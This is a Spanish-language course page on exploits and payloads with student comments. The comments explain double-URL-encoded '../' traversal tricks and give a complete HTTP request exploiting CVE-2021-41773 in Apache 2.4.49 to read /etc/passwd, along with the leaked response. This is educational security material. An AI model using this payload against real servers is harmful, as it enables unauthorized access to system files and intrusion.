Aún no tienes acceso a esta clase

Crea una cuenta y continúa viendo este curso

¿Qué son los exploits y los payloads?

14/22
Recursos

Aportes 8

Preguntas 0

Ordenar por:

¿Quieres ver más aportes, preguntas y respuestas de la comunidad? Crea una cuenta o inicia sesión.

El exploit abre la puerta y la carga útil te roba la casa 😂

Qué son los exploits y los payloads?
Exploit:

Hace referencia a los pasos a seguir o el método que se refiere para explotar una vulnerabilidad. También se hace referencia al scripts, código o programa que explota la vulnerabilidad de manera automática.

Payload:

se encarga de ejecutar una acción dentro del sistema explotado. Puede ser el comando para ejecutar una acción donde puede establecer una conexión entre el atacante y el sistema infectado y poder controlarlo.

https://www.urldecoder.org/

.%%25%33%32%25%36%35/ decodificado da: .%%32%65/

.%%32%65/ decodificado da: .%2e/

.%2e/ decodificado da: …/ (subir nivel)

con ese trucazo de los …/ encodeados ya tengo arto por probar jeje

Para que no les pase lo mismo que a mi: Asegúrense de dar clic en “Decode” en la parte superior de la página. Por default está en “Encode” y obvio no arroja los resultados esperados.

2:18 En esta parte el profesor quizo decir “El Payload” no el “Exploit”, aunque luego lo clarifica.

…/ 😃

Vulnerabilidad CVE-2021-41773

  • GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 Host: https://www.twitter.com/vulnmachines User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0. 9,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Pragma: no-cache Cache-Control: no-cache

El objetivo es la carpeta etc y el archivo password.

El exploit es: /cgi-bin/ /.%2e/%2e%2e/%2e%2e/%2e%2e
El payload es: /etc/passwd

  • El resultado en el sistema Linux: todos los usuarios

  • HTTP/1.1 200 OK DATE: Tue, 05 Oct 2021 14:51:37 GMT Server: Apache/2.4.49 (Unix) OpenSSL/1.0.2k-fips Last-Modified: Fri, 18 Jun 2021 09:31:30 GMT ETag: “820-5c506fd229535” Accept-Ranges: bytes Content-Length: 2080 Vary: User-Agent Connection: close root❌0:0:root:/root:/bin/bash daemon❌1:1:daemon:/usr/sbin:/usr/sbin/nologin bin❌2:2:bin:/bin:/usr/sbin/nologin sys❌3:3:sys:/dev:/usr/sbin/nologin sync❌4:65534:sync:/bin:/bin/sync games❌5:60:games:/usr/games:/usr/sbin/nologin man❌6:12👨/var/cache/man:/usr/sbin/nologin lp❌7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail❌8:8:mail:/var/mail:/usr/sbin/nologin news❌9:9:news:/var/spool/news:/usr/sbin/nologin uucp❌10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy❌13:13:proxy:/bin:/usr/sbin/nologin www-data❌33:33:www-data:/var/www:/usr/sbin/nologin backup❌34:34:backup:/var/backups:/usr/sbin/nologin list❌38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc❌39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats❌41:41:Gnats Bug-Reporting System